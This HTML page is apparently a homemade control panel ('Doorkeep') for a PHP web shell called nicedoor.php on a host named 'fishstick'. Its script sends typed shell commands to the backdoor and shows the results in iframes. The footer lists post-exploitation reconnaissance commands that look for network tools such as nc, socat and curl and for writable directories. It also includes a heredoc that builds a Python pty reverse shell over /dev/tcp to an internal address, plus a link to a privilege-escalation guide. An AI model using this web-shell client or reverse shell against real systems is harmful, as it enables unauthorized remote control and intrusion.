<!DOCTYPE html><html lang="en">

<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Doorkeep</title>
<style>
    h1,h2,h3 { text-align: center;}
    iframe {min-width: max(18rem, 96vw - 1rem);   min-height: min(90% - 2rem, 95vh);}
    .cmd-out-div {
        resize: vertical; min-height: 2.2rem; max-height: 98vh; min-width: 20rem;
          overflow: auto scroll;}
    [data-ifrm-sz="sl-sm"] iframe {
        min-height: min(3rem, 90% - 2rem, 95vh);
        max-height: 3.5rem;
    }
    [data-ifrm-sz="xx-sm"] iframe {
        min-height: min(3.5rem, 90% - 2rem, 95vh);
        max-height: 3.9rem;
    }
    [data-ifrm-sz="x-sm"] iframe {
        min-height: max(2.5rem, min(8.5rem, 90% - 2rem, 95vh));
        max-height: 9.9rem;
    }
    [data-ifrm-sz="sm"] iframe {
        min-height: max(4.5rem, min(15.5rem, 90% - 2rem, 95vh));
        max-height: 16.9rem;
    }
    [data-ifrm-sz="md13"] iframe {
        min-height: max(9.5rem, min(23.5rem, 90% - 2rem, 95vh));
        max-height: 24.9rem;
    }
    [data-ifrm-sz="md17"] iframe {
        min-height: max(10.5rem, min(27.5rem, 90% - 2rem, 95vh));
        max-height: 29.9rem;
    }
    [data-ifrm-sz="lg"] iframe {
        min-height: max(19.5rem, min(41.5rem, 90% - 2rem, 95vh));
        max-height: 44.9rem;
    }
    [data-ifrm-sz="x-lg"] iframe {
        min-height: max(25.5rem, min(51.5rem, 90% - 2rem, 95vh));
        max-height: 60.9rem;
    }
    [data-ifrm-sz="xx-lg"] iframe {
        min-height: max(35.5rem, min(87.5rem, 90% - 2rem, 95vh));
        max-height: 44.9rem;
    }
    footer p {max-width: clamp(12em,90vw,72em);}
</style>
<script>
function rszSelect_cb(evt) {
    const newSz = evt.target.value;
    let cntDiv = evt.target.closest('div.cmd-out-div');
    let ifrm = cntDiv.getElementsByTagName('iframe')[0];
    let pre = cntDiv.getElementsByTagName('pre')[0];
    const hBySz ={
        'sl-sm': 18, 'xx-sm':28, 'x-sm':65, 'sm':150,
        'md13': 210, 'md17': 250, 'lg': 360, 'x-lg': 445, 'xx-lg': 700,
    }
    ifrm.setAttribute('height',hBySz[newSz]);
    cntDiv.dataset.ifrmSz=newSz;

}
function cmd_cb() {
    let resdv = document.getElementById('results');
    let cmdta = document.getElementById('cmdta');
    let cmdSz = document.getElementById('cmd-sz').value;
    const tplate = document.getElementById('tmpl-ifrm');
    let clone = tplate.content.firstElementChild.cloneNode(true);
    let h = Math.max(19,Math.round( (document.firstElementChild.clientHeight * cmdSz)/17));
    let ifrm = clone.getElementsByTagName('iframe')[0];
    let pre = clone.getElementsByTagName('pre')[0];
    let rszSel = clone.getElementsByTagName('select')[0];
    ifrm.setAttribute(
        'src',
        "http://fishstick/swancorp/nicedoor.php?nh&cmd=" +
            encodeURIComponent(cmdta.value)
        )
    ifrm.setAttribute('height',h);
    pre.innerText=cmdta.value;
    rszSel.addEventListener("change",rszSelect_cb);
    resdv.appendChild(clone);
}
</script>
<h1>Doorkeep</h1>
<div id=results></div>
<div id=cmddv>
    <form id=cmmdfrm >
        <textarea name="cmd" id="cmdta" cols="72" rows="10"></textarea>
        <input type="button" value="Do It!" id=cmd-doit-btn >
        <input type="range" id="cmd-sz" list=cmd-sz-dl
        min="1" max="9" value="2" step=0.1 orient=vertical >
        <label for="cmd-sz">Iframe height</label>
    </form>
</div>
<footer>
<p>A little bit nicer interface to fishstick's nicedoor. Escapes the cmds and places results into iframes.
    Still a bit unpolished and has weird quirks.
</p>
<p>Here are a few suggested commands:</p>
<pre>
pwd;export -p;declare -p;type bash curl ksh lua nc netcat nc.traditional netcat-traditional nmap node openssl php python python3 scp raku perl gcc cc go rustc cargo make git ftp tftp smbclient socat ssh tar vim wget cpan ftp mysql mysqldump mysqlsh lsblk findmnt
id;whoami;groups
df -h;findmnt;cat /etc/{fstab,mtab} /proc/self/mountinfo; ls -lF / /home/ /var/ 
ls -FaR ..
ls -FaR ../**/*.php

find / -xdev -type d -writable -print
find ${PATH//:/ } -executable -print
find ${PATH//:/$' '} -executable -print

ls /usr/local/nagios/bin /usr/local/nagios/sbin
find / -type d \( -perm -g+w -or -perm -o+w \)
</pre>
<pre>

cat &lt;&lt;EOPRB &gt; pty-rev-bash
#! /bin/bash
H=10.10.127.$(( $1 - 325 )
P=$(( $2 + 2660 ))
sleep 2
python -c &apos;import pty;pty.spawn(&quot;/bin/bash&quot;)&apos; &lt; /dev/tcp/${H}/${P} 1&gt;&amp;0 2&gt;&amp;0 &amp;
disown
EOPRB
chmod +x pty-rev-bash
ls -l pty-rev-bash

</pre>
<p>
    <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/"
    >Basic Linux Privilege Escalation</a> has some more examples of posible commands
</p>
</footer>
<template id=tmpl-ifrm>
  <div class="cmd-out-div">
    <pre></pre>
    <iframe  frameborder=1 sandbox="" width=800 ></iframe>
  
    <form >
        <select class="rsz-select">
            <optgroup label="small">
                <option value="sl-sm">single line</option>
                <option value="xx-sm">1-3 lines</option>
                <option value="x-sm">3-8 lines</option>
                <option value="sm">8-15 lines</option>
            </optgroup>
            <optgroup label="medium">
                <option value="md13">13-21 lines</option>
                <option value="md17">17-24 lines</option>
            </optgroup>
            <optgroup label="large">
                <option value="lg">24-37 lines</option>
                <option value="x-lg">29-45 lines</option>
                <option value="x-lg">43-77 lines</option>
            </optgroup>
        </select>
    </form>
    </div>
</template>
<datalist id=cmd-sz-dl ><option>2.9</option><option>5.8</option><option>8.6</option></datalist>

<script>
(function (){
    let doit = document.getElementById('cmd-doit-btn');
    doit.addEventListener('click', cmd_cb);
})()
</script>
